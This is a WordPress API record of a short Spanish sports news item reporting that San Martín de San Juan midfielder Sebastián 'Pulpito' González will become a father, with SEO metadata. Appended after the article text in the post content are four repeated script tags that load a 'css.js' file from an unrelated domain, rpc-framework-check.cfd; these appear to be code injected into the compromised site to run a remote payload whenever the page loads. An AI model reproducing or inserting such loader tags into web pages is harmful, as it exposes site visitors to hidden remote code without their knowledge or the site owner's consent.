{"id":23252,"date":"2025-07-01T13:17:58","date_gmt":"2025-07-01T16:17:58","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=23252"},"modified":"2026-02-02T19:02:13","modified_gmt":"2026-02-02T22:02:13","slug":"una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/","title":{"rendered":"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">La felicidad invade la vida personal de uno de los jugadores m\u00e1s queridos del plantel de San Mart\u00edn de San Juan. Sebasti\u00e1n \u201cPulpito\u201d Gonz\u00e1lez, una de las figuras claves del equipo que logr\u00f3 el ascenso a Primera Divisi\u00f3n, comparti\u00f3 en sus redes una emotiva noticia: ser\u00e1 pap\u00e1 por primera vez.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u201c\u00a1No podemos m\u00e1s de felicidad y amor! \u00a1Pap\u00e1 y mam\u00e1 te aman mucho! SEREMOS 3\u201d, escribi\u00f3 el mediocampista de 32 a\u00f1os, acompa\u00f1ado de una dulce imagen que conmovi\u00f3 a los hinchas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Gonz\u00e1lez, referente dentro y fuera del campo de juego, se ha ganado el cari\u00f1o de la hinchada verdinegra no solo por su entrega futbol\u00edstica, sino tambi\u00e9n por su carisma y conexi\u00f3n con el club. Ahora, vive un momento especial en su vida personal, que celebra junto a su pareja y con la familia futbolera que lo sigue en cada paso.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>La felicidad invade la vida personal de uno de los jugadores m\u00e1s queridos del plantel de San Mart\u00edn de San Juan. Sebasti\u00e1n \u201cPulpito\u201d Gonz\u00e1lez, una de las figuras claves del equipo que logr\u00f3 el ascenso a Primera Divisi\u00f3n, comparti\u00f3 en sus redes una emotiva noticia: ser\u00e1 pap\u00e1 por primera vez. \u201c\u00a1No podemos m\u00e1s de felicidad [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":23255,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[48,2,180,178],"tags":[],"class_list":["post-23252","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacada","category-featured","category-fuera-de-juego","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1 - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1 - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"La felicidad invade la vida personal de uno de los jugadores m\u00e1s queridos del plantel de San Mart\u00edn de San Juan. Sebasti\u00e1n \u201cPulpito\u201d Gonz\u00e1lez, una de las figuras claves del equipo que logr\u00f3 el ascenso a Primera Divisi\u00f3n, comparti\u00f3 en sus redes una emotiva noticia: ser\u00e1 pap\u00e1 por primera vez. \u201c\u00a1No podemos m\u00e1s de felicidad [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-01T16:17:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:02:13+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/07\/pulpito.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"992\" \/>\n\t<meta property=\"og:image:height\" content=\"917\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Pablo Pujado\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pablo Pujado\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#article\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/\"},\"author\":{\"name\":\"Pablo Pujado\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/eda4d8e62a5d42b111781e3cdfcb9c3a\"},\"headline\":\"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1\",\"datePublished\":\"2025-07-01T16:17:58+00:00\",\"dateModified\":\"2026-02-02T22:02:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/\"},\"wordCount\":166,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/pulpito.jpg\",\"articleSection\":[\"destacada\",\"Featured\",\"Fuera de Juego\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/\",\"name\":\"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1 - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#primaryimage\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/pulpito.jpg\",\"datePublished\":\"2025-07-01T16:17:58+00:00\",\"dateModified\":\"2026-02-02T22:02:13+00:00\",\"breadcrumb\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/pulpito.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/pulpito.jpg\",\"width\":992,\"height\":917},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/01\\\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/eda4d8e62a5d42b111781e3cdfcb9c3a\",\"name\":\"Pablo Pujado\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/310b69d28112912c333408a462a9837208de951b1e7c11514781740412f648b1?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/310b69d28112912c333408a462a9837208de951b1e7c11514781740412f648b1?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/310b69d28112912c333408a462a9837208de951b1e7c11514781740412f648b1?s=96&d=mm&r=g\",\"caption\":\"Pablo Pujado\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/pablo-pujado\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1 - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/","og_locale":"es_ES","og_type":"article","og_title":"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1 - San Juan Deportes","og_description":"La felicidad invade la vida personal de uno de los jugadores m\u00e1s queridos del plantel de San Mart\u00edn de San Juan. Sebasti\u00e1n \u201cPulpito\u201d Gonz\u00e1lez, una de las figuras claves del equipo que logr\u00f3 el ascenso a Primera Divisi\u00f3n, comparti\u00f3 en sus redes una emotiva noticia: ser\u00e1 pap\u00e1 por primera vez. \u201c\u00a1No podemos m\u00e1s de felicidad [&hellip;]","og_url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-07-01T16:17:58+00:00","article_modified_time":"2026-02-02T22:02:13+00:00","og_image":[{"width":992,"height":917,"url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/07\/pulpito.jpg","type":"image\/jpeg"}],"author":"Pablo Pujado","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"Pablo Pujado","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#article","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/"},"author":{"name":"Pablo Pujado","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/eda4d8e62a5d42b111781e3cdfcb9c3a"},"headline":"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1","datePublished":"2025-07-01T16:17:58+00:00","dateModified":"2026-02-02T22:02:13+00:00","mainEntityOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/"},"wordCount":166,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/07\/pulpito.jpg","articleSection":["destacada","Featured","Fuera de Juego","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#respond"]}]},{"@type":"WebPage","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/","url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/","name":"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1 - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#primaryimage"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/07\/pulpito.jpg","datePublished":"2025-07-01T16:17:58+00:00","dateModified":"2026-02-02T22:02:13+00:00","breadcrumb":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/07\/pulpito.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/07\/pulpito.jpg","width":992,"height":917},{"@type":"BreadcrumbList","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/01\/una-alegria-fuera-de-la-cancha-jugador-de-san-martin-sera-papa\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Una alegr\u00eda fuera de la cancha: jugador de San Mart\u00edn ser\u00e1 pap\u00e1"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/eda4d8e62a5d42b111781e3cdfcb9c3a","name":"Pablo Pujado","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/310b69d28112912c333408a462a9837208de951b1e7c11514781740412f648b1?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/310b69d28112912c333408a462a9837208de951b1e7c11514781740412f648b1?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/310b69d28112912c333408a462a9837208de951b1e7c11514781740412f648b1?s=96&d=mm&r=g","caption":"Pablo Pujado"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/pablo-pujado\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23252","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=23252"}],"version-history":[{"count":5,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23252\/revisions"}],"predecessor-version":[{"id":28776,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23252\/revisions\/28776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/23255"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=23252"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=23252"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=23252"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}